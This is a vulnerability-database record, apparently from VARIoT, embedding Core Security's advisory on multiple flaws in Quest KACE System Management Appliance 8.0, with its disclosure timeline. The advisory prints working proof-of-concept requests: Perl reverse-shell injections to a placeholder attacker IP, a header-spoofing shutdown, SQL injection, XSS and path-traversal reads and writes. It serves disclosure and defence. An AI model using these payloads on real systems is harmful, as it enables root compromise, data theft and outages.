name=\"IMAGES_JSON\"\n\n{\"/../../../resources/TestWrite\":\"aaaaaa,VGVzdENvbnRlbnQ=\"}\n-----------------------------2671551246366368501556269100\nContent-Disposition: form-data; name=\"FARRAY[ID]\"\n[...SNIPPED...]\n-----/\n\nTaking advantage of 7.2 and 7.4 we are able to verify the file creation:\n\n/-----\n[root@k10000 /kbox/kboxwww/resources]# ls -lha\ntotal 32\ndrwxr-xr-x 2 www wheel 512B Feb 9 20:40 . 
\ndrwxr-xr-x 23 root wheel 512B Nov 14 18:29 .. \n-rw-r--r-- 1 www wheel 11B Feb 9 20:40 TestWrite\n-----/\n\n8. *Report Timeline*\n2018-02-26: Core Security (Core) sent an initial notification to Quest\nSoftware Inc. (Quest) via web form. \n2018-03-05: Quest Support confirmed the receipt and requested additional\ninformation. \n2018-03-12: Core Security sent a draft advisory including a technical\ndescription. \n2018-03-16: Quest Support asked for the CVE-IDs. \n2018-03-16: Core Security answered saying that the CVE-IDs are required\nonce the vendor verifies the vulnerabilities. Additionally, Core Security\nrequested a confirmation about the reported vulnerabilities and a tentative\ntimescale to fix them. Finally, Core Security requested that Quest use\nCore\u0027s advisories-publication email address as the official communication\nchannel, also copying the researchers behind this discovery. \n2018-03-16: Quest Support thanked Core\u0027s reply and stated it will be in\ntouch during the process. \n2018-03-20: Quest Support informed that they had not yet received any\nupdates from the engineering team and had requested one. \n2018-03-21: Quest Support requested information about the KACE version\nused for reporting the issues and also Core\u0027s company name and information. \n2018-03-21: Core replied with the affected version (that was included in\nthe original draft advisory) and a link to the Core company website and\nthe list of previous security advisories. \n2018-03-21: Quest Support acknowledged the information provided. \n2018-03-26: Quest\u0027s KACE product manager (PM) thanked Core for making it\naware of the security issues found and the level of thoroughness and details\nprovided. Quest specified it had fixes already in place for some of the\nissues. Quest\u0027s KACE PM asked for a conference call in order to understand\nmore about Core\u0027s offerings for future engagements. 
Finally, Quest\u0027s KACE\nPM notified Core that the work done by Core is in breach of its license agreement,\nand requested Core not to distribute the findings to the public, otherwise\nQuest would take legal action. \n2018-04-13: Quest\u0027s KACE PM sent a follow-up email and informed Core that it\nmade a hotfix to patch the reported vulnerabilities. Quest also requested\na call to understand future opportunities based on Core\u0027s\ncompany capabilities. Finally, Quest asked for information about the\nresearchers who found the vulnerabilities and a link of Core\u0027s choosing\nin order to be included in Quest\u0027s Acknowledgment page\n(https://support.quest.com/essentials/vulnerability-reporting-acknowledgements). \n2018-04-16: Core answered the email from 2018-03-26 stating the company is\nfollowing standard practices with regard to coordinated vulnerability\ndisclosure, and also sent detailed technical information about our findings\nat Quest\u0027s request. Core also mentioned Quest seems to be well versed in\nthe disclosure process and expects vendors to coordinate with it prior to\npublication via Quest\u0027s vulnerability reporting process, and that Quest\u0027s\nlegal threat appears to be in direct contradiction to the disclosure\nprocess that they encourage on their website. Finally, Core asked about\nQuest\u0027s intention to work collaboratively to address these vulnerabilities\nand to follow industry standard disclosure processes, which involve\npublication of the vulnerabilities. \n2018-04-17: Quest\u0027s KACE PM replied saying it is willing to collaborate\nand is looking forward to having a conversation over the phone in order to\ncontinue the next steps in its vulnerability process (forwarded email from\n2018-04-13). \n2018-04-17: Core thanked Quest for the answer and stated its preference for keeping\nwritten communications between the parties in order to better document the\nprocess, and communicated the next steps of the process including: 1. 
Testing\nthe fix (if vendor agrees), 2. Get CVE-IDs, 3. Get a Vendor\u0027s link to be\nincluded in the advisory and finally 4. Send final advisory version to\nvendor and coordinate publication date together. With regard to Quest\u0027s\nrequests, Core provided the researchers\u0027 names and the URL at which the advisory\nwould be published. Finally, Core stated that the request for other Core\ncompany services could be forwarded to the Core services team if needed\n(and asked for the right contact at Quest) but our intention is to keep that\nservices request separate from the coordinated disclosure process. \n2018-04-18: Quest Support informed Core that they had publicly made available\npatches (security patch SEC2018_20180410, see section 5) for their customers and unilaterally closed the case. \n2018-05-31: Advisory CORE-2018-0004 published. \n\n9. *References*\n\n[1] https://www.quest.com/products/kace-systems-management-appliance/\n\n10. *About CoreLabs*\n\nCoreLabs, the research center of Core Security, is charged with anticipating\nthe future needs and requirements for information security technologies. \nWe conduct our research in several important areas of computer security\nincluding system vulnerabilities, cyber-attack planning and simulation,\nsource code auditing, and cryptography. Our results include problem\nformalization, identification of vulnerabilities, novel solutions and\nprototypes for new technologies. CoreLabs regularly publishes security\nadvisories, technical papers, project information and shared software\ntools for public use at:\nhttp://corelabs.coresecurity.com. \n\n11. *About Core Security*\n\nCore Security provides companies with the security insight they need to\nknow who, how, and what is vulnerable in their organization. The company\u0027s\nthreat-aware, identity \u0026 access, network security, and vulnerability\nmanagement solutions provide actionable insight and context needed to\nmanage security risks across the enterprise. 
This shared insight gives\ncustomers a comprehensive view of their security posture to make better\nsecurity remediation decisions. Better insight allows organizations to\nprioritize their efforts to protect critical assets, take action sooner\nto mitigate access risk, and react faster if a breach does occur. \n\nCore Security is headquartered in the USA with offices and operations in\nSouth America, Europe, Middle East and Asia. To learn more, contact Core\nSecurity at (678) 304-4500 or info@coresecurity.com\n\n12. *Disclaimer*\n\nThe contents of this advisory are copyright (c) 2018 Core Security and (c)\n2018 CoreLabs, and are licensed under a Creative Commons Attribution\nNon-Commercial Share-Alike 3.0 (United States) License:\nhttp://creativecommons.org/licenses/by-nc-sa/3.0/us/\n\n13. *PGP/GPG Keys*\n\nThis advisory has been signed with the GPG key of Core Security\nadvisories team, which is available for download at\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-11136"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005458"
},
{
"db": "VULMON",
"id": "CVE-2018-11136"
},
{
"db": "PACKETSTORM",
"id": "148005"
}
],
"trust": 1.8
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-11136",
"trust": 2.6
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005458",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1218",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "148005",
"trust": 0.2
},
{
"db": "VULMON",
"id": "CVE-2018-11136",
"trust": 0.1
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2018-11136"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005458"
},
{
"db": "PACKETSTORM",
"id": "148005"
},
{
"db": "NVD",
"id": "CVE-2018-11136"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1218"
}
]
},
"id": "VAR-201805-0596",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.5800866
},
"last_update_date": "2023-12-18T12:01:57.551000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "KACE Systems Management Appliance",
"trust": 0.8,
"url": "https://www.quest.com/products/kace-systems-management-appliance/"
},
{
"title": "Quest KACE System Management Appliance SQL injection vulnerability repair measures",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=81230"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-005458"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1218"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-89",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-005458"
},
{
"db": "NVD",
"id": "CVE-2018-11136"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.6,
"url": "https://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11136"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-11136"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/89.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://packetstormsecurity.com/files/148005/quest-kace-system-management-appliance-8.0-build-8.0.318-xss-traversal-code-execution-sql-injection.html"
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11139"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11134"
},
{
"trust": 0.1,
"url": "http://[serverip]/common/download_agent_installer.php?platform=windows\u0026serv=58b9e89c12f57e492df8f1d744b6ed5a4d394b454ca8a99176caba35fd13ec1f\u0026orgid=1"
},
{
"trust": 0.1,
"url": "http://[serverip]/systemui/settings_network.php"
},
{
"trust": 0.1,
"url": "https://support.quest.com/essentials/reporting-security-vulnerability."
},
{
"trust": 0.1,
"url": "http://[serverip]/adminui/advisory.php?id=10"
},
{
"trust": 0.1,
"url": "http://creativecommons.org/licenses/by-nc-sa/3.0/us/"
},
{
"trust": 0.1,
"url": "http://www.coresecurity.com/files/attachments/core_security_advisories.asc."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11135"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11140"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11132"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11133"
},
{
"trust": 0.1,
"url": "https://www.quest.com/products/kace-systems-management-appliance/"
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com."
},
{
"trust": 0.1,
"url": "https://support.quest.com/essentials/vulnerability-reporting-acknowledgements)."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11141"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11142"
},
{
"trust": 0.1,
"url": "https://support.quest.com/download-install-detail/6086148."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11138"
},
{
"trust": 0.1,
"url": "http://[serverip]/adminui/analysis_report_list.php?category_id="
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11137"
},
{
"trust": 0.1,
"url": "http://[serverip]/common/run_cross_report.php?uniqueid=366314513\u0026id=585\u0026org=1\u0026fmt=xls34403\u0027)%3balert(1)%2f%2f952"
},
{
"trust": 0.1,
"url": "https://support.quest.com/kace-systems-management-appliance/kb/254193/security-vulnerability-patch-sec2018_20180410-"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2018-11136"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005458"
},
{
"db": "PACKETSTORM",
"id": "148005"
},
{
"db": "NVD",
"id": "CVE-2018-11136"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1218"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULMON",
"id": "CVE-2018-11136"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005458"
},
{
"db": "PACKETSTORM",
"id": "148005"
},
{
"db": "NVD",
"id": "CVE-2018-11136"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1218"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-05-31T00:00:00",
"db": "VULMON",
"id": "CVE-2018-11136"
},
{
"date": "2018-07-18T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-005458"
},
{
"date": "2018-05-31T20:52:06",
"db": "PACKETSTORM",
"id": "148005"
},
{
"date": "2018-05-31T18:29:00.450000",
"db": "NVD",
"id": "CVE-2018-11136"
},
{
"date": "2018-06-01T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201805-1218"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-06-29T00:00:00",
"db": "VULMON",
"id": "CVE-2018-11136"
},
{
"date": "2018-07-18T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-005458"
},
{
"date": "2018-06-29T18:50:01.197000",
"db": "NVD",
"id": "CVE-2018-11136"
},
{
"date": "2018-06-01T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201805-1218"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "148005"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1218"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Quest KACE System Management Appliance SQL injection vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-005458"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SQL injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201805-1218"
}
],
"trust": 0.6
}
}
VAR-201805-0592
Vulnerability from variot - Updated: 2023-12-18 12:01 In order to perform actions that require higher privileges, the Quest KACE System Management Appliance 8.0.318 relies on a message queue that runs daemonized with root privileges and only allows a set of commands to be executed. A command injection vulnerability exists within this message queue which allows low-privilege users to append arbitrary commands that will be run as root. Quest KACE System Management Appliance contains a command injection vulnerability. Information may be obtained or altered, and service operation may be disrupted (DoS). Quest KACE System Management Appliance is an IT asset management device from Quest Software, USA. Core Security - Corelabs Advisory http://corelabs.coresecurity.com/
Quest KACE System Management Appliance Multiple Vulnerabilities
- Advisory Information
Title: Quest KACE System Management Appliance Multiple Vulnerabilities Advisory ID: CORE-2018-0004 Advisory URL: http://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities Date published: 2018-05-31 Date of last update: 2018-05-22 Vendors contacted: Quest Software Inc. Release mode: Forced release
- Vulnerability Information
Class: Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Deserialization of Untrusted Data [CWE-502], Improper Privilege Management [CWE-269], Improper Privilege Management [CWE-269], Improper Authorization [CWE-285], Improper Neutralization of Special Elements used in an SQL Command [CWE-89], Improper Neutralization of Special Elements used in an SQL Command [CWE-89], Improper Neutralization of Input During Web Page Generation [CWE-79], External Control of File Name or Path [CWE-73], External Control of File Name or Path [CWE-73] Impact: Code execution Remotely Exploitable: Yes Locally Exploitable: Yes CVE Name: CVE-2018-11138, CVE-2018-11139, CVE-2018-11135, CVE-2018-11134, CVE-2018-11132, CVE-2018-11142, CVE-2018-11136, CVE-2018-11140, CVE-2018-11133, CVE-2018-11137, CVE-2018-11141
- Vulnerability Description
From Quest KACE's website:
"The KACE Systems Management Appliance [1] provides your growing organization with comprehensive management of network-connected devices, including servers, PCs, Macs, Chromebooks, tablets, printers, storage, networking gear and the Internet of Things (IoT). KACE can fulfill all of your organization's systems management needs, from initial deployment to ongoing management and retirement."
Multiple vulnerabilities were found in the Quest KACE System Management Virtual Appliance that would allow a remote attacker to gain command execution as root. We present three vectors to achieve this, including one that can be exploited as an unauthenticated user.
Additional web application vulnerabilities were found in the web console that is bundled with the product. These vulnerabilities are detailed in section 7.
Note: This advisory has limited details on the vulnerabilities because during the attempted coordinated disclosure process, Quest advised us not to distribute our original findings to the public or else they would take legal action. Quest's definition of "responsible disclosure" can be found at https://support.quest.com/essentials/reporting-security-vulnerability.
CoreLabs has been publishing security advisories since 1997 and believes in coordinated disclosure and good faith collaboration with software vendors before disclosure to help ensure that a fix or workaround solution is ready and available when the vulnerability details are publicized. We believe that providing technical details about each finding is necessary to provide users and organizations with enough information to understand the implications of the vulnerabilities against their environment and, most importantly, to prioritize the remediation activities aiming at mitigating risk.
We regret Quest's posture on disclosure during the whole process (detailed in the Report Timeline section) and the lack of a possibility of engaging into a coordinated publication date, something we achieve (and have achieved) with many vendors as part of our coordinated disclosure practices.
- Vulnerable Packages
Quest KACE System Management Appliance 8.0 (Build 8.0.318). Other products and versions might be affected too, but they were not tested.
- Vendor Information, Solutions and Workarounds
Quest reports that it has released the security vulnerability patch SEC2018_20180410 to address the reported vulnerabilities. The patch can be downloaded at https://support.quest.com/download-install-detail/6086148.
For more details, Quest published the following Security Note: https://support.quest.com/kace-systems-management-appliance/kb/254193/security-vulnerability-patch-sec2018_20180410-
- Credits
These vulnerabilities were discovered and researched by Leandro Barragan and Guido Leo from Core Security Consulting Services. The publication of this advisory was coordinated by Leandro Cuozzo from Core Advisories Team.
- Technical Description / Proof of Concept Code
Quest KACE SMA ships with a web console that provides administrators and users with several features. Multiple vulnerabilities were found in the context of this console, both from an authenticated and unauthenticated perspective.
Section 7.1 describes how an unauthenticated attacker could gain command execution on the system as the web server user.
Vulnerabilities described in 7.2 and 7.3 could also be abused to gain code execution but would require the attacker to have a valid authentication token.
In addition, issues found in the Sudo Server module presented in 7.4 and 7.5 would allow the attacker to elevate his privileges from the web server user to root, effectively obtaining full control of the device.
Additional web application vulnerabilities were found in the console, such as insufficient authorization for critical functions, which would allow an anonymous attacker to reconfigure the appliance (7.6), SQL injection vulnerabilities (7.7, 7.8), a cross-site scripting issue (7.9), and path traversal vulnerabilities, which would allow an attacker to read, write and delete arbitrary files (7.9, 7.10, 7.11).
7.1. Unauthenticated command injection
[CVE-2018-11138] The '/common/download_agent_installer.php' script is accessible to anonymous users in order to download an agent for a specific platform.
The script receives the following parameters via the GET method:
. platform: Indicates the platform in which the agent is going to be installed . serv: SHA256 hash of a fixed value that depends on each appliance . orgid: Organization ID . version: Version number of the agent
The last two conditions are simple to meet. The Agent versions are publicly available within the Quest KACE site, but even if they were not, we found that the Organization ID parameter is vulnerable to a time based SQL injection (refer to issue 7.7). This would make it possible to obtain the agent version by querying the table 'CLIENT_DISTRIBUTION' and fetching the contents of the 'VERSION' column. The Organization ID is 1 by default, but could be obtained in the same way as the Agent version by querying the table 'ORGANIZATION' and the column 'ID'.
As stated above, the application uses the Organization ID and Agent version parameters to execute commands. This means we need to find a way to append system commands within the Organization ID, without breaking the SQL query. If we use the comment symbol (#), we can append anything we want without affecting the result of the query.
Preparing payload:
/----- - platform = windows - serv = ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c - orgid = 1#;perl -e 'use Socket;$i="[AttackerIP]";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'; - version = 8.0.152 (last agent version available for windows) -----/
The following proof of concept executes a reverse shell:
/----- GET /common/download_agent_installer.php?platform=windows&serv=ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c&orgid=1%23%3bperl+-e+'use+Socket%3b$i%3d"[AttackerIP]"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">%26S")%3bopen(STDOUT,">%26S")%3bopen(STDERR,">%26S")%3bexec("/bin/sh+-i")%3b}%3b'%3b&version=8.0.152 HTTP/1.1 Host: Server Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 0 -----/
/----- $ nc -lvp 8080 Listening on [0.0.0.0] (family 0, port 8080) Connection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2, sport 20050) sh: can't access tty; job control turned off $ id uid=80(www) gid=80(www) groups=80(www) -----/
7.2. Authenticated command injection
[CVE-2018-11139] The '/common/ajax_email_connection_test.php' script used to test the configured SMTP server is accessible by any authenticated user and can be abused to execute arbitrary commands on the system. This script is vulnerable to command injection via the unsanitized user input 'TEST_SERVER' sent to the script via POST method.
The following proof of concept executes a reverse shell:
/----- POST /common/ajax_email_connection_test.php HTTP/1.1 Host: [ServerIP] Accept: application/json, text/javascript, /; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 416 Cookie: [Cookie] Connection: close
TEST_SERVER=test;perl+-e+'use+Socket%3b$i%3d"[AttackerIP]"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">%26S")%3bopen(STDOUT,">%26S")%3bopen(STDERR,">%26S")%3bexec("/bin/sh+-i")%3b}%3b';&TEST_PORT=587&TEST_USERNAME=eaea@eaea.com&TEST_PASSWORD=1234&TEST_OLD_PASSWORD=&QUEUE_ID=1&TEST_TO_EMAIL=eaea@eaea.com&ACTION=TEST_CONNECTION_SMTP -----/
/----- $ nc -lvp 8080 Listening on [0.0.0.0] (family 0, port 8080) Connection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2, sport 20050) sh: can't access tty; job control turned off $ id uid=80(www) gid=80(www) groups=80(www) -----/
7.3. PHP Object Injection leading to arbitrary command execution
[CVE-2018-11135] An authenticated user could abuse a deserialization call on the script '/adminui/error_details.php' to inject arbitrary PHP objects.
To exploit this issue, the parameter 'ERROR_MESSAGES' needs to be an array and meet some specific conditions in order to successfully exploit the issue.
7.4.
One of the available commands allows changing any user's password (including root).
Assuming we are able to run commands in the server, we could abuse this feature by changing the password of the 'kace_support' account, which comes disabled by default but has full sudo privileges.
7.5.
7.6. Insufficient Authorization for critical function
[CVE-2018-11142] 'systemui/settings_network.php' and 'systemui/settings_patching.php' scripts are accessible only from localhost. This restriction can be bypassed by modifying the 'Host' and 'X_Forwarded_For' HTTP headers.
The following proof of concept abuses this vulnerability to shutdown the server as an anonymous user:
/----- POST /systemui/settings_network.php HTTP/1.1 Host: localhost X-Forwarded-For: ::1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://[ServerIp]/systemui/settings_network.php Content-Type: multipart/form-data; boundary=---------------------------5642543667001619951434940129 Content-Length: 3418 Connection: close Upgrade-Insecure-Requests: 1
-----------------------------5642543667001619951434940129 Content-Disposition: form-data; name="CSRF_TOKEN" -----------------------------5642543667001619951434940129 Content-Disposition: form-data; name="$shutdown" DoIt! Content-Disposition: form-data; name="save" Save -----------------------------5642543667001619951434940129-- -----/
7.7. Unauthenticated SQL Injection in download_agent_installer.php
[CVE-2018-11136] The 'orgID' parameter received by the '/common/download_agent_installer.php' script is not sanitized, leading to SQL injection. In particular, a blind time based type.
The following proof of concept induces a time delay:
/----- http://[ServerIP]/common/download_agent_installer.php?platform=windows&serv=58b9e89c12f57e492df8f1d744b6ed5a4d394b454ca8a99176caba35fd13ec1f&orgid=1 AND SLEEP(10)%23;&version=8.0.152 -----/
7.8. SQL Injection in run_report.php
[CVE-2018-11140] The 'reportID' parameter received by the '/common/run_report.php' script is not sanitized, leading to SQL injection. In particular, an error based type.
The following proof of concept retrieves the current database name:
/----- POST /common/run_report.php HTTP/1.1 Content-Length: 161 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Host: [ServerIP] Accept: text/html,application/xhtml xml,application/xml;q=0.9,/;q=0.8 Connection: close Referer: http://[ServerIP]/adminui/analysis_report_list.php?CATEGORY_ID= Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Cookie: [Cookie]
date=1516135247598&reportId=-3161+UNION+ALL+SELECT+CONCAT(0x7170706a71,IFNULL(CAST(DATABASE()+AS+CHAR),0x20),0x716a707171),NULL--+LhEx&reportName=&format=pdf -----/
/----- HTTP/1.1 200 OK Date: Thu, 08 Feb 2018 21:50:21 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Access-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key, x-kace-auth-signature, accept, origin, content-type Access-Control-Allow-Origin: * Access-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS X-KACE-Appliance: K1000 X-KACE-Host: [ServerIP] X-KACE-Version: 8.0.318 X-KBOX-WebServer: [ServerIP] X-KBOX-Version: 8.0.318 X-KACE-WebServer: [ServerIP] X-UA-Compatible: IE=9,EDGE Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform Content-Length: 3548 Connection: close Content-Type: text/html; charset=utf-8
[...SNIPPED...]
<![endif]-->Report Queued: qppjqORG1qjpqq<meta http-equiv='refresh' [...SNIPPED...] -----/
7.9. Unauthenticated Cross Site Scripting in run_cross_report.php
[CVE-2018-11133] The 'fmt' parameter of the '/common/run_cross_report.php' script is vulnerable to cross-site scripting.
The following proof of concept demonstrates the vulnerability:
/----- http://[ServerIP]/common/run_cross_report.php?uniqueId=366314513&id=585&org=1&fmt=xls34403')%3balert(1)%2f%2f952 -----/
7.10. Path traversal in download_attachment.php leading to arbitrary file read
[CVE-2018-11137] The 'checksum' parameter of the '/common/download_attachment.php' script can be abused to read arbitrary files with 'www' privileges. The following proof of concept reads the '/etc/passwd' file. No administrator privileges are needed to execute this script.
It is worth noting that there are several interesting files that can be read with 'www' privileges, such as all the files located in '/kbox/bin/koneas/keys/' and '/kbox/kboxwww/include/globals.inc', which contain plaintext passwords.
/----- http://[ServerIP]/common/run_cross_report.php?uniqueId=366314513&id=585&org=1&fmt=xls34403')%3balert(1)%2f%2f952 -----/
The following proof of concept demonstrates the vulnerability:
/----- GET /common/download_attachment.php?checksum=/../../../../../../../../../../../etc/passwd&filename= HTTP/1.1 Host: [ServerIP] Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: [Cookie] Connection: close Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK Date: Thu, 18 Jan 2018 17:18:19 GMT Server: Apache Cache-Control: must-revalidate, post-check=0, pre-check=0 Expires: -1 Pragma: public Content-Disposition: attachment; filename="" Content-Transfer-Encoding: Binary Content-Description: K1000 attachment Content-Length: 2400 Access-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key, x-kace-auth-signature, accept, origin, content-type Access-Control-Allow-Origin: * Access-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS X-KACE-Appliance: K1000 X-KACE-Host: k10000. X-KACE-Version: 8.0.318 X-KBOX-WebServer: k10000. X-KBOX-Version: 8.0.318 X-KACE-WebServer: k10000. X-UA-Compatible: IE=9,EDGE Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform Connection: close Content-Type: application/octet-stream
$FreeBSD: releng/11.0/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr $
root::0:0:Charlie &:/root:/bin/csh daemon::1:1:Owner of many system processes:/root:/usr/sbin/nologin operator::2:5:System &:/:/usr/sbin/nologin bin::3:7:Binaries Commands and Source:/:/usr/sbin/nologin tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin[...SNIPPED...] -----/
7.11. Path traversal in advisory.php leading to arbitrary file creation/deletion
[CVE-2018-11141] The 'IMAGES_JSON' and 'attachments_to_remove[]' parameters of the '/adminui/advisory.php' script can be abused to write and delete files respectively. The following proof of concept creates a file located at '/kbox/kboxwww/resources/TestWrite' with the content 'Sarasa' (base64 encoded). Files can be at any location where the 'www' user has write permissions.
File deletion could be abused to delete '/kbox/kboxwww/systemui/reports/setup_completed.log' file. This file's existence defines if the appliance setup wizard is shown or not.
The following proof of concept demonstrates the vulnerability:
/----- POST /adminui/advisory.php?ID=10 HTTP/1.1 Host: [ServerIP] Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://[ServerIP]/adminui/advisory.php?ID=10 Content-Type: multipart/form-data; boundary=---------------------------2671551246366368501556269100 Content-Length: 1705 Cookie: [Cookie] Connection: close Upgrade-Insecure-Requests: 1
-----------------------------2671551246366368501556269100 Content-Disposition: form-data; name="CSRF_TOKEN"
99c2addf067719d6fc3ae32ded351f000af8efdd091f162baa2a34516cefecc741cb13a69c80554a9ba32908d1c683102d3455eac39bcafc8854f46a04b2044e -----------------------------2671551246366368501556269100 Content-Disposition: form-data; name="IMAGES_JSON"
